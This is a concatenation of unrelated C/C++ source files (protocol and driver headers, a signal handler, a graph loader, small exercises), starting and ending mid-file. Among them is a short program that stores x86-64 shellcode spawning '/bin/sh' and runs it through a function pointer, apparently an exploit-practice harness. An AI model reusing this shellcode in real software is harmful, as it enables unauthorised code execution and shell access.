CHECKSUM_OFFSET=MESSAGE_SIZE_OFFSET+MESSAGE_SIZE_SIZE, HEADER_SIZE=MESSAGE_START_SIZE+COMMAND_SIZE+MESSAGE_SIZE_SIZE+CHECKSUM_SIZE }; char pchMessageStart[MESSAGE_START_SIZE]; char pchCommand[COMMAND_SIZE]; unsigned int nMessageSize; unsigned int nChecksum; }; /** nServices flags */ enum { NODE_NETWORK = (1 << 0), NODE_BLOOM = (1 << 1), }; /** A CService with information about it as peer */ class CAddress : public CService { public: CAddress(); explicit CAddress(CService ipIn, uint64 nServicesIn=NODE_NETWORK); void Init(); IMPLEMENT_SERIALIZE ( CAddress* pthis = const_cast<CAddress*>(this); CService* pip = (CService*)pthis; if (fRead) pthis->Init(); if (nType & SER_DISK) READWRITE(nVersion); if ((nType & SER_DISK) || (nVersion >= CADDR_TIME_VERSION && !(nType & SER_GETHASH))) READWRITE(nTime); READWRITE(nServices); READWRITE(*pip); ) void print() const; // TODO: make private (improves encapsulation) public: uint64 nServices; // disk and network only unsigned int nTime; // memory only int64 nLastTry; }; /** inv message data */ class CInv { public: CInv(); CInv(int typeIn, const uint256& hashIn); CInv(const std::string& strType, const uint256& hashIn); IMPLEMENT_SERIALIZE ( READWRITE(type); READWRITE(hash); ) friend bool operator<(const CInv& a, const CInv& b); bool IsKnownType() const; const char* GetCommand() const; std::string ToString() const; void print() const; // TODO: make private (improves encapsulation) public: int type; uint256 hash; }; enum { MSG_TX = 1, MSG_BLOCK, // Nodes may always request a MSG_FILTERED_BLOCK in a getdata, however, // MSG_FILTERED_BLOCK should not appear in any invs except as a part of getdata. MSG_FILTERED_BLOCK, }; #endif // __INCLUDED_PROTOCOL_H__
/***************************************************************************//** * @file displayls013b7dh03config.h * @brief BRD4104A specific configuration for the display driver for * the Sharp Memory LCD model LS013B7DH03. * @version 5.6.0 ******************************************************************************* * # License * <b>Copyright 2017 Silicon Labs, Inc. http://www.silabs.com</b> ******************************************************************************* * * This file is licensed under the Silabs License Agreement. See the file * "Silabs_License_Agreement.txt" for details. Before using this software for * any purpose, you must agree to the terms of that agreement. * ******************************************************************************/ #ifndef DISPLAYLS013B7DH03CONFIG_H #define DISPLAYLS013B7DH03CONFIG_H #include "displayconfigapp.h" /* Display device name. */ #define SHARP_MEMLCD_DEVICE_NAME "Sharp LS013B7DH03 #1" /* LCD and SPI GPIO pin connections on the kit. */ #define LCD_PORT_SCLK (gpioPortC) /* EFM_DISP_SCLK on PC8 */ #define LCD_PIN_SCLK (8) #define LCD_PORT_SI (gpioPortC) /* EFM_DISP_MOSI on PC6 */ #define LCD_PIN_SI (6) #define LCD_PORT_SCS (gpioPortD) /* EFM_DISP_CS on PD14 */ #define LCD_PIN_SCS (14) #define LCD_PORT_EXTCOMIN (gpioPortD) /* EFM_DISP_COM on PD13 */ #define LCD_PIN_EXTCOMIN (13) #define LCD_PORT_DISP_SEL (gpioPortD) /* EFM_DISP_ENABLE on PD15 */ #define LCD_PIN_DISP_SEL (15) /* PRS settings for polarity inversion extcomin auto toggle. */ #define LCD_AUTO_TOGGLE_PRS_CH (4) /* PRS channel 4. */ #define LCD_AUTO_TOGGLE_PRS_ROUTELOC() PRS->ROUTELOC1 = \ ((PRS->ROUTELOC1 & ~_PRS_ROUTELOC1_CH4LOC_MASK) | PRS_ROUTELOC1_CH4LOC_LOC4) #define LCD_AUTO_TOGGLE_PRS_ROUTEPEN PRS_ROUTEPEN_CH4PEN /* * Select how LCD polarity inversion should be handled: * * If POLARITY_INVERSION_EXTCOMIN is defined, * and the polarity inversion is armed for every rising edge of the EXTCOMIN * pin. The actual polarity inversion is triggered at the next transision of * SCS. This mode is recommended because it causes less CPU and SPI load than * the alternative mode, see below. * If POLARITY_INVERSION_EXTCOMIN is undefined, * the polarity inversion is toggled by sending an SPI command. This mode * causes more CPU and SPI load than using the EXTCOMIN pin mode. */ #define POLARITY_INVERSION_EXTCOMIN /* Define POLARITY_INVERSION_EXTCOMIN_PAL_AUTO_TOGGLE if you want the PAL * (Platform Abstraction Layer interface) to automatically toggle the EXTCOMIN * pin. * If the PAL_TIMER_REPEAT function is defined the EXTCOMIN toggling is handled * by a timer repeat system, therefore we must undefine * POLARITY_INVERSION_EXTCOMIN_PAL_AUTO_TOGGLE; */ #ifndef PAL_TIMER_REPEAT_FUNCTION #define POLARITY_INVERSION_EXTCOMIN_PAL_AUTO_TOGGLE #endif #endif /* DISPLAYLS013B7DH03CONFIG_H */
/* \file * \author Chris Bradley * \brief This file contains system level routines. * * \section LICENSE * * Version: MPL 1.1/GPL 2.0/LGPL 2.1 * * The contents of this file are subject to the Mozilla Public License * Version 1.1 (the "License"); you may not use this file except in * compliance with the License. You may obtain a copy of the License at * http://www.mozilla.org/MPL/ * * Software distributed under the License is distributed on an "AS IS" * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the * License for the specific language governing rights and limitations * under the License. * * The Original Code is OpenCMISS * * The Initial Developer of the Original Code is University of Auckland, * Auckland, New Zealand, the University of Oxford, Oxford, United * Kingdom and King's College, London, United Kingdom. Portions created * by the University of Auckland, the University of Oxford and King's * College, London are Copyright (C) 2007-2010 by the University of * Auckland, the University of Oxford and King's College, London. * All Rights Reserved. * * Contributor(s): * * Alternatively, the contents of this file may be used under the terms of * either the GNU General Public License Version 2 or later (the "GPL"), or * the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), * in which case the provisions of the GPL or the LGPL are applicable instead * of those above. If you wish to allow use of your version of this file only * under the terms of either the GPL or the LGPL, and not to allow others to * use your version of this file under the terms of the MPL, indicate your * decision by deleting the provisions above and replace them with the notice * and other provisions required by the GPL or the LGPL. If you do not delete * the provisions above, a recipient may use your version of this file under * the terms of any one of the MPL, the GPL or the LGPL. * */ /* Included files */ #include <signal.h> #include <stdio.h> #include <stdlib.h> #include "cmiss.h" /* Type definitions */ /* Function prototypes */ void cmfe_ResetFatalHandler(void); void cmfe_SetFatalHandler(void); void cmfe_InitFatalHandler(void); /* Internal functions */ static void cmfe_FatalHandler(int sig #if defined (sun) ,siginfo_t *sip, ucontext_t *uap #else #ifndef __MINGW32__ ,int code #if defined(_AIX) ,struct sigcontext *sc #endif #endif #endif ); /* Static variables */ /* static sigjmp_buf jump_buffer; */ static struct sigaction fatal_sigaction; static struct sigaction old_SIGBUS_action; #ifdef SIGEMT static struct sigaction old_SIGEMT_action; #endif static struct sigaction old_SIGFPE_action; static struct sigaction old_SIGILL_action; static struct sigaction old_SIGINT_action; static struct sigaction old_SIGABRT_action; static struct sigaction old_SIGSEGV_action; static struct sigaction old_SIGTRAP_action; void cmfe_ResetFatalHandler() { #if defined (SIGBUS) if( 0 != sigaction(SIGBUS,&old_SIGBUS_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGBUS handler.\n"); } #endif /* defined (SIGBUS) */ #ifdef SIGEMT if( 0 != sigaction(SIGEMT,&old_SIGEMT_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGEMT handler.\n"); } #endif if( 0 != sigaction(SIGFPE,&old_SIGFPE_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGFPE handler.\n"); } if( 0 != sigaction(SIGILL,&old_SIGILL_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGILL handler.\n"); } if( 0 != sigaction(SIGINT,&old_SIGINT_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGINT handler.\n"); } if( 0 != sigaction(SIGABRT,&old_SIGABRT_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGABRT handler.\n"); } if( 0 != sigaction(SIGSEGV,&old_SIGSEGV_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGSEGV handler.\n"); } #if defined (SIGTRAP) if( 0 != sigaction(SIGTRAP,&old_SIGTRAP_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGTRAP handler.\n"); } #endif /* defined (SIGTRAP) */ } void cmfe_SetFatalHandler(void) { #if (defined (unix) || defined (_AIX)) && !defined(__MINGW32__) #if defined (SIGBUS) if( 0 != sigaction(SIGBUS,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: Could not set SIGBUS handler.\n"); } #endif /* defined (SIGBUS) */ #ifdef SIGEMT if( 0 != sigaction(SIGEMT,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGEMT handler.\n"); } #endif if( 0 != sigaction(SIGFPE,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGFPE handler.\n"); } if( 0 != sigaction(SIGILL,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGILL handler.\n"); } if( 0 != sigaction(SIGINT,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGINT handler.\n"); } if( 0 != sigaction(SIGABRT,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGABRT handler.\n"); } if( 0 != sigaction(SIGSEGV,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGSEGV handler.\n"); } #if defined (SIGTRAP) if( 0 != sigaction(SIGTRAP,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGTRAP handler.\n"); } #endif /* defined (SIGTRAP) */ #endif /* defined (unix) || defined (_AIX) */ } static void cmfe_FatalHandler(int sig #if defined (sun) ,siginfo_t *sip, ucontext_t *uap #else #ifndef __MINGW32__ ,int code #if defined(_AIX) ,struct sigcontext *sc #endif #endif #endif ) { #if defined(_AIX) /* this from libxlf90.a provides a good description of what went wrong */ xl__sigdump(sig,code,sc); #else switch(sig) { #if defined (SIGBUS) case SIGBUS: { fprintf(stderr,">>FATAL ERROR: Bus error occurred.\n"); } break; #endif /* defined (SIGBUS) */ #if defined (SIGEMT) case SIGEMT: { fprintf(stderr,">>FATAL ERROR: EMT occurred.\n"); } break; #endif /* defined (SIGEMT) */ case SIGFPE: { fprintf(stderr,">>FATAL ERROR: Floating point execption occurred.\n"); } break; case SIGILL: { fprintf(stderr,">>FATAL ERROR: Illegal instruction occurred.\n"); } break; case SIGINT: { fprintf(stderr,">>FATAL ERROR: Interrupt occurred.\n"); } break; case SIGABRT: { fprintf(stderr,">>FATAL ERROR: Abort occurred.\n"); } break; case SIGSEGV: { fprintf(stderr,">>FATAL ERROR: Segment violation occurred.\n"); } break; #if defined (SIGTRAP) case SIGTRAP: { fprintf(stderr,">>FATAL ERROR: Trace trap occurred.\n"); } break; #endif /* defined (SIGTRAP) */ default: { fprintf(stderr,">>FATAL ERROR: Unknown signal %d occurred.\n" #ifndef __MINGW32__ ,code #endif ); } break; } #endif /* There is an issue with signal handling in a library such as OpenCMISS. The best option would be to jump back to where the user called an OpenCMISS routine and let them process the error if that is what they wish. This, however, would require setting the long jump buffer at each entry point to the OpenCMISS library. This could be done by modifying enters in opencmiss.F90 but may cause performance problems (probably not too bad as the major computations are inside the library rather than at the interface). For now just stop the program on a signal. */ /* siglongjmp(jump_buffer,sig); */ exit(sig); } void cmfe_InitFatalHandler(void) { fatal_sigaction.sa_flags = SA_NODEFER; fatal_sigaction.sa_handler = (void (*)(int))cmfe_FatalHandler; if( 0 != sigemptyset(&fatal_sigaction.sa_mask) ) { fprintf(stderr,">>WARNING: sigemptyset failed in CMISSInitFatalHandler.\n"); } #if defined (SIGBUS) sigaction(SIGBUS,NULL,&old_SIGBUS_action); #endif /* defined (SIGBUS) */ #if defined (SIGEMT) sigaction(SIGEMT,NULL,&old_SIGEMT_action); #endif /* defined (SIGEMT) */ sigaction(SIGFPE,NULL,&old_SIGFPE_action); sigaction(SIGILL,NULL,&old_SIGILL_action); sigaction(SIGINT,NULL,&old_SIGINT_action); sigaction(SIGABRT,NULL,&old_SIGABRT_action); sigaction(SIGSEGV,NULL,&old_SIGSEGV_action); #if defined (SIGTRAP) sigaction(SIGTRAP,NULL,&old_SIGTRAP_action); #endif /* defined (SIGTRAP) */ }
/* * %CopyrightBegin% * * Copyright Ericsson AB 1998-2020. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * %CopyrightEnd% */ #ifndef _DB_HASH_H #define _DB_HASH_H #include "erl_db_util.h" /* DbTerm & DbTableCommon */ typedef struct fixed_deletion { UWord slot : sizeof(UWord)*8 - 2; UWord all : 1; UWord trap : 1; struct fixed_deletion *next; } FixedDeletion; typedef Uint32 HashVal; typedef struct hash_db_term { struct hash_db_term* next; /* next bucket */ #if SIZEOF_VOID_P == 4 Uint32 hvalue : 31; /* stored hash value */ Uint32 pseudo_deleted : 1; # define MAX_HASH_MASK (((Uint32)1 << 31)-1) #elif SIZEOF_VOID_P == 8 Uint32 hvalue; Uint32 pseudo_deleted; # define MAX_HASH_MASK ((Uint32)(Sint32)-1) #endif DbTerm dbterm; /* The actual term */ } HashDbTerm; #ifdef ERTS_DB_HASH_LOCK_CNT #define DB_HASH_LOCK_CNT ERTS_DB_HASH_LOCK_CNT #else #define DB_HASH_LOCK_CNT 64 #endif typedef struct DbTableHashLockAndCounter { Sint nitems; Sint lck_stat; erts_rwmtx_t lck; } DbTableHashLockAndCounter; typedef struct db_table_hash_fine_lock_slot { union { DbTableHashLockAndCounter lck_ctr; byte _cache_line_alignment[ERTS_ALC_CACHE_LINE_ALIGN_SIZE(sizeof(DbTableHashLockAndCounter))]; } u; } DbTableHashFineLockSlot; typedef struct db_table_hash { DbTableCommon common; erts_atomic_t lock_array_resize_state; /* szm, nactive, shrink_limit are write-protected by is_resizing or table write lock */ erts_atomic_t szm; /* current size mask. */ erts_atomic_t nactive; /* Number of "active" slots */ erts_atomic_t shrink_limit; /* Shrink table when fewer objects than this */ erts_atomic_t segtab; /* The segment table (struct segment**) */ struct segment* first_segtab[1]; /* SMP: nslots and nsegs are protected by is_resizing or table write lock */ int nlocks; /* Needs to be smaller or equal to nactive */ int nslots; /* Total number of slots */ int nsegs; /* Size of segment table */ /* List of slots where elements have been deleted while table was fixed */ erts_atomic_t fixdel; /* (FixedDeletion*) */ erts_atomic_t is_resizing; /* grow/shrink in progress */ DbTableHashFineLockSlot* locks; } DbTableHash; typedef enum { DB_HASH_LOCK_ARRAY_RESIZE_STATUS_NORMAL = 0, DB_HASH_LOCK_ARRAY_RESIZE_STATUS_GROW = 1, DB_HASH_LOCK_ARRAY_RESIZE_STATUS_SHRINK = 2 } db_hash_lock_array_resize_state; /* To adapt number of locks if hash table with {write_concurrency, auto} */ void erl_db_hash_adapt_number_of_locks(DbTable* tb); /* ** Function prototypes, looks the same (except the suffix) for all ** table types. The process is always an [in out] parameter. */ void db_initialize_hash(void); SWord db_unfix_table_hash(DbTableHash *tb); Uint db_kept_items_hash(DbTableHash *tb); /* Interface for meta pid table */ int db_create_hash(Process *p, DbTable *tbl /* [in out] */); int db_put_hash(DbTable *tbl, Eterm obj, int key_clash_fail, SWord* consumed_reds_p); int db_get_hash(Process *p, DbTable *tbl, Eterm key, Eterm *ret); int db_erase_hash(DbTable *tbl, Eterm key, Eterm *ret); typedef struct { float avg_chain_len; float std_dev_chain_len; float std_dev_expected; int max_chain_len; int min_chain_len; int kept_items; }DbHashStats; void db_calc_stats_hash(DbTableHash* tb, DbHashStats*); Eterm erts_ets_hash_sizeof_ext_segtab(void); void erts_db_foreach_thr_prgr_offheap_hash(void (*func)(ErlOffHeap *, void *), void *arg); #ifdef ERTS_ENABLE_LOCK_COUNT void erts_lcnt_enable_db_hash_lock_count(DbTableHash *tb, int enable); #endif #endif /* _DB_HASH_H */
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_memcmp.c :+: :+: :+: */ /* +:+ +:+ +:+ */ /* By: anowak <anowak@student.42.fr> +#+ +:+ +#+ */ /* +#+#+#+#+#+ +#+ */ /* Created: 2014/11/08 15:24:21 by anowak #+# #+# */ /* Updated: 2014/11/08 15:32:40 by anowak ### ########.fr */ /* */ /* ************************************************************************** */ #include "libft.h" int ft_memcmp(const void *s1, const void *s2, size_t n) { unsigned int x; x = 0; while (x < n) { if (*((unsigned char *)s1 + x) != *((unsigned char *)s2 + x)) return (*((unsigned char *)s1 + x) - *((unsigned char *)s2 + x)); x++; } return (0); }
/* * SPDX-License-Identifier: MIT * * Copyright © 2018 Intel Corporation * * Autogenerated file by GPU Top : https://github.com/rib/gputop * DO NOT EDIT manually! */ #include <linux/sysfs.h> #include "i915_drv.h" #include "i915_oa_sklgt3.h" static const struct i915_oa_reg b_counter_config_test_oa[] = { { _MMIO(0x2740), 0x00000000 }, { _MMIO(0x2744), 0x00800000 }, { _MMIO(0x2714), 0xf0800000 }, { _MMIO(0x2710), 0x00000000 }, { _MMIO(0x2724), 0xf0800000 }, { _MMIO(0x2720), 0x00000000 }, { _MMIO(0x2770), 0x00000004 }, { _MMIO(0x2774), 0x00000000 }, { _MMIO(0x2778), 0x00000003 }, { _MMIO(0x277c), 0x00000000 }, { _MMIO(0x2780), 0x00000007 }, { _MMIO(0x2784), 0x00000000 }, { _MMIO(0x2788), 0x00100002 }, { _MMIO(0x278c), 0x0000fff7 }, { _MMIO(0x2790), 0x00100002 }, { _MMIO(0x2794), 0x0000ffcf }, { _MMIO(0x2798), 0x00100082 }, { _MMIO(0x279c), 0x0000ffef }, { _MMIO(0x27a0), 0x001000c2 }, { _MMIO(0x27a4), 0x0000ffe7 }, { _MMIO(0x27a8), 0x00100001 }, { _MMIO(0x27ac), 0x0000ffe7 }, }; static const struct i915_oa_reg flex_eu_config_test_oa[] = { }; static const struct i915_oa_reg mux_config_test_oa[] = { { _MMIO(0x9840), 0x00000080 }, { _MMIO(0x9888), 0x11810000 }, { _MMIO(0x9888), 0x07810013 }, { _MMIO(0x9888), 0x1f810000 }, { _MMIO(0x9888), 0x1d810000 }, { _MMIO(0x9888), 0x1b930040 }, { _MMIO(0x9888), 0x07e54000 }, { _MMIO(0x9888), 0x1f908000 }, { _MMIO(0x9888), 0x11900000 }, { _MMIO(0x9888), 0x37900000 }, { _MMIO(0x9888), 0x53900000 }, { _MMIO(0x9888), 0x45900000 }, { _MMIO(0x9888), 0x33900000 }, }; static ssize_t show_test_oa_id(struct device *kdev, struct device_attribute *attr, char *buf) { return sprintf(buf, "1\n"); } void i915_perf_load_test_config_sklgt3(struct drm_i915_private *dev_priv) { strlcpy(dev_priv->perf.oa.test_config.uuid, "2b985803-d3c9-4629-8a4f-634bfecba0e8", sizeof(dev_priv->perf.oa.test_config.uuid)); dev_priv->perf.oa.test_config.id = 1; dev_priv->perf.oa.test_config.mux_regs = mux_config_test_oa; dev_priv->perf.oa.test_config.mux_regs_len = ARRAY_SIZE(mux_config_test_oa); dev_priv->perf.oa.test_config.b_counter_regs = b_counter_config_test_oa; dev_priv->perf.oa.test_config.b_counter_regs_len = ARRAY_SIZE(b_counter_config_test_oa); dev_priv->perf.oa.test_config.flex_regs = flex_eu_config_test_oa; dev_priv->perf.oa.test_config.flex_regs_len = ARRAY_SIZE(flex_eu_config_test_oa); dev_priv->perf.oa.test_config.sysfs_metric.name = "2b985803-d3c9-4629-8a4f-634bfecba0e8"; dev_priv->perf.oa.test_config.sysfs_metric.attrs = dev_priv->perf.oa.test_config.attrs; dev_priv->perf.oa.test_config.attrs[0] = &dev_priv->perf.oa.test_config.sysfs_metric_id.attr; dev_priv->perf.oa.test_config.sysfs_metric_id.attr.name = "id"; dev_priv->perf.oa.test_config.sysfs_metric_id.attr.mode = 0444; dev_priv->perf.oa.test_config.sysfs_metric_id.show = show_test_oa_id; }
/* * This file belongs to the Galois project, a C++ library for exploiting * parallelism. The code is being released under the terms of the 3-Clause BSD * License (a copy is located in LICENSE.txt at the top-level directory). * * Copyright (C) 2018, The University of Texas at Austin. All rights reserved. * UNIVERSITY EXPRESSLY DISCLAIMS ANY AND ALL WARRANTIES CONCERNING THIS * SOFTWARE AND DOCUMENTATION, INCLUDING ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR ANY PARTICULAR PURPOSE, NON-INFRINGEMENT AND WARRANTIES OF * PERFORMANCE, AND ANY WARRANTY THAT MIGHT OTHERWISE ARISE FROM COURSE OF * DEALING OR USAGE OF TRADE. NO WARRANTY IS EITHER EXPRESS OR IMPLIED WITH * RESPECT TO THE USE OF THE SOFTWARE OR DOCUMENTATION. Under no circumstances * shall University be liable for incidental, special, indirect, direct or * consequential damages or loss of profits, interruption of business, or * related expenses which may arise from use of Software or Documentation, * including but not limited to those resulting from defects in Software and/or * Documentation, or loss or inaccuracy of data of any kind. */ #ifndef KATANA_LIBGALOIS_KATANA_READGRAPH_H_ #define KATANA_LIBGALOIS_KATANA_READGRAPH_H_ #include "katana/Details.h" #include "katana/FileGraph.h" #include "katana/Galois.h" #include "katana/Timer.h" #include "katana/config.h" namespace katana { /** * Allocates and constructs a graph from a file. Tries to balance * memory evenly across system. Cannot be called during parallel * execution. */ template <typename GraphTy, typename... Args> void readGraph(GraphTy& graph, Args&&... args) { typename GraphTy::read_tag tag; readGraphDispatch(graph, tag, std::forward<Args>(args)...); } template <typename GraphTy> void readGraphDispatch( GraphTy& graph, read_default_graph_tag tag, const std::string& filename, const bool readUnweighted = false) { FileGraph f; if (readUnweighted) { //! If user specifies that the input graph is unweighted, //! the file graph also should be aware of this. //! Note that the application still could use the edge data array. f.fromFileInterleaved<void>(filename); } else { f.fromFileInterleaved<typename GraphTy::file_edge_data_type>(filename); } readGraphDispatch(graph, tag, f, readUnweighted); } template <typename GraphTy> struct ReadGraphConstructFrom { GraphTy& graph; FileGraph& f; bool readUnweighted = false; ReadGraphConstructFrom(GraphTy& g, FileGraph& _f) : graph(g), f(_f) {} ReadGraphConstructFrom(GraphTy& g, FileGraph& _f, bool _readUnweighted) : graph(g), f(_f), readUnweighted(_readUnweighted) {} void operator()(unsigned tid, unsigned total) { graph.constructFrom(f, tid, total, readUnweighted); } }; template <typename GraphTy> void readGraphDispatch( GraphTy& graph, read_default_graph_tag, FileGraph& f, const bool readUnweighted = false) { graph.allocateFrom(f); ReadGraphConstructFrom<GraphTy> reader(graph, f, readUnweighted); katana::on_each(reader); } template <typename GraphTy, typename Aux> struct ReadGraphConstructNodesFrom { GraphTy& graph; FileGraph& f; Aux& aux; ReadGraphConstructNodesFrom(GraphTy& g, FileGraph& _f, Aux& a) : graph(g), f(_f), aux(a) {} void operator()(unsigned tid, unsigned total) { graph.constructNodesFrom(f, tid, total, aux); } }; template <typename GraphTy, typename Aux> struct ReadGraphConstructEdgesFrom { GraphTy& graph; FileGraph& f; Aux& aux; ReadGraphConstructEdgesFrom(GraphTy& g, FileGraph& _f, Aux& a) : graph(g), f(_f), aux(a) {} void operator()(unsigned tid, unsigned total) { graph.constructEdgesFrom(f, tid, total, aux); } }; template <typename GraphTy> void readGraphDispatch( GraphTy& graph, read_with_aux_graph_tag tag, const std::string& filename) { FileGraph f; f.fromFileInterleaved<typename GraphTy::file_edge_data_type>(filename); readGraphDispatch(graph, tag, f); } template <typename GraphTy> void readGraphDispatch(GraphTy& graph, read_with_aux_graph_tag, FileGraph& f) { typedef typename GraphTy::ReadGraphAuxData Aux; Aux aux; graph.allocateFrom(f, aux); ReadGraphConstructNodesFrom<GraphTy, Aux> nodeReader(graph, f, aux); katana::on_each(nodeReader); ReadGraphConstructEdgesFrom<GraphTy, Aux> edgeReader(graph, f, aux); katana::on_each(edgeReader); } template <typename GraphTy, typename Aux> struct ReadGraphConstructOutEdgesFrom { GraphTy& graph; FileGraph& f; Aux& aux; ReadGraphConstructOutEdgesFrom(GraphTy& g, FileGraph& _f, Aux& a) : graph(g), f(_f), aux(a) {} void operator()(unsigned tid, unsigned total) { graph.constructOutEdgesFrom(f, tid, total, aux); } }; template <typename GraphTy, typename Aux> struct ReadGraphConstructInEdgesFrom { GraphTy& graph; FileGraph& f; Aux& aux; ReadGraphConstructInEdgesFrom(GraphTy& g, FileGraph& _f, Aux& a) : graph(g), f(_f), aux(a) {} void operator()(unsigned tid, unsigned total) { graph.constructInEdgesFrom(f, tid, total, aux); } }; template <typename GraphTy> void readGraphDispatch(GraphTy& graph, read_with_aux_first_graph_tag, FileGraph& f) { typedef typename GraphTy::ReadGraphAuxData Aux; constexpr static const bool profile = false; katana::CondStatTimer<profile> TAlloc("AllocateAux"); TAlloc.start(); Aux* auxPtr = new Aux; graph.allocateFrom(f, *auxPtr); TAlloc.stop(); katana::CondStatTimer<profile> TNode("ConstructNode"); TNode.start(); ReadGraphConstructNodesFrom<GraphTy, Aux> nodeReader(graph, f, *auxPtr); katana::on_each(nodeReader); TNode.stop(); katana::CondStatTimer<profile> TOutEdge("ConstructOutEdge"); TOutEdge.start(); ReadGraphConstructOutEdgesFrom<GraphTy, Aux> outEdgeReader(graph, f, *auxPtr); katana::on_each(outEdgeReader); TOutEdge.stop(); katana::CondStatTimer<profile> TInEdge("ConstructInEdge"); TInEdge.start(); ReadGraphConstructInEdgesFrom<GraphTy, Aux> inEdgeReader(graph, f, *auxPtr); katana::on_each(inEdgeReader); TInEdge.stop(); katana::CondStatTimer<profile> TDestruct("DestructAux"); TDestruct.start(); delete auxPtr; TDestruct.stop(); } template <typename GraphTy> void readGraphDispatch( GraphTy& graph, read_with_aux_first_graph_tag tag, const std::string& filename) { FileGraph f; f.fromFileInterleaved<typename GraphTy::file_edge_data_type>(filename); readGraphDispatch(graph, tag, f); } template <typename GraphTy> void readGraphDispatch( GraphTy& graph, read_lc_inout_graph_tag, const std::string& f1, const std::string& f2) { graph.createAsymmetric(); typename GraphTy::out_graph_type::read_tag tag1; readGraphDispatch(graph, tag1, f1); typename GraphTy::in_graph_type::read_tag tag2; readGraphDispatch(graph.inGraph, tag2, f2); } template <typename GraphTy> void readGraphDispatch( GraphTy& graph, read_lc_inout_graph_tag, FileGraph& f1, FileGraph& f2) { graph.createAsymmetric(); typename GraphTy::out_graph_type::read_tag tag1; readGraphDispatch(graph, tag1, f1); typename GraphTy::in_graph_type::read_tag tag2; readGraphDispatch(graph.inGraph, tag2, f2); } template <typename GraphTy> void readGraphDispatch(GraphTy& graph, read_lc_inout_graph_tag, FileGraph& f1) { typename GraphTy::out_graph_type::read_tag tag1; readGraphDispatch(graph, tag1, f1); } template <typename GraphTy> void readGraphDispatch( GraphTy& graph, read_lc_inout_graph_tag, const std::string& f1) { typename GraphTy::out_graph_type::read_tag tag1; readGraphDispatch(graph, tag1, f1); } } // namespace katana #endif
/* Coin sums * Finds the possible ways to give 2 pounds * Konstantinos Ameranis 15.11.2013 */ #include <stdio.h> #define BALANCE 200 #define int long int int coins(int balance, int *values, int index); int main() { int values[] = {200, 100, 50, 20, 10, 5, 2, 1}; printf("%ld\n", coins(BALANCE, values, 0)); return 0; } int coins(int balance, int *values, int index) { if(0==balance) return 1; if(balance < 0) return 0; int sum = 0; for(int i=index; i < 8; i++) { sum += coins(balance-values[i], values, i); } return sum; }
#include <unistd.h> char shellcode[] = "\x48\x31\xd2\x48\x31\xf6\x48\xbf" "\x2f\x62\x69\x6e\x2f\x73\x68\x11" "\x48\xc1\xe7\x08\x48\xc1\xef\x08" "\x57\x48\x89\xe7\x48\xb8\x3b\x11" "\x11\x11\x11\x11\x11\x11\x48\xc1" "\xe0\x38\x48\xc1\xe8\x38\x0f\x05"; int main(int argc, char ** argv) { void (*fp)(); fp = (void(*)())shellcode; (void)(*fp)(); return 0; }
// Copyright (C) 2002-2012 Nikolaus Gebhardt // This file is part of the "Irrlicht Engine". // For conditions of distribution and use, see copyright notice in irrlicht.h #ifndef __E_MATERIAL_TYPES_H_INCLUDED__ #define __E_MATERIAL_TYPES_H_INCLUDED__ namespace irr { namespace video { //! Abstracted and easy to use fixed function/programmable pipeline material modes. enum E_MATERIAL_TYPE { //! Standard solid material. /** Only first texture is used, which is supposed to be the diffuse material. */ EMT_SOLID = 0, //! Solid material with 2 texture layers. /** The second is blended onto the first using the alpha value of the vertex colors. This material is currently not implemented in OpenGL. */ EMT_SOLID_2_LAYER, //! Material type with standard lightmap technique /** There should be 2 textures: The first texture layer is a diffuse map, the second is a light map. Dynamic light is ignored. */ EMT_LIGHTMAP, //! Material type with lightmap technique like EMT_LIGHTMAP. /** But lightmap and diffuse texture are added instead of modulated. */ EMT_LIGHTMAP_ADD, //! Material type with standard lightmap technique /** There should be 2 textures: The first texture layer is a diffuse map, the second is a light map. Dynamic light is ignored. The texture colors are effectively multiplied by 2 for brightening. Like known in DirectX as D3DTOP_MODULATE2X. */ EMT_LIGHTMAP_M2, //! Material type with standard lightmap technique /** There should be 2 textures: The first texture layer is a diffuse map, the second is a light map. Dynamic light is ignored. The texture colors are effectively multiplyied by 4 for brightening. Like known in DirectX as D3DTOP_MODULATE4X. */ EMT_LIGHTMAP_M4, //! Like EMT_LIGHTMAP, but also supports dynamic lighting. EMT_LIGHTMAP_LIGHTING, //! Like EMT_LIGHTMAP_M2, but also supports dynamic lighting. EMT_LIGHTMAP_LIGHTING_M2, //! Like EMT_LIGHTMAP_4, but also supports dynamic lighting. EMT_LIGHTMAP_LIGHTING_M4, //! Detail mapped material. /** The first texture is diffuse color map, the second is added to this and usually displayed with a bigger scale value so that it adds more detail. The detail map is added to the diffuse map using ADD_SIGNED, so that it is possible to add and substract color from the diffuse map. For example a value of (127,127,127) will not change the appearance of the diffuse map at all. Often used for terrain rendering. */ EMT_DETAIL_MAP, //! Look like a reflection of the environment around it. /** To make this possible, a texture called 'sphere map' is used, which must be set as the first texture. */ EMT_SPHERE_MAP, //! A reflecting material with an optional non reflecting texture layer. /** The reflection map should be set as first texture. */ 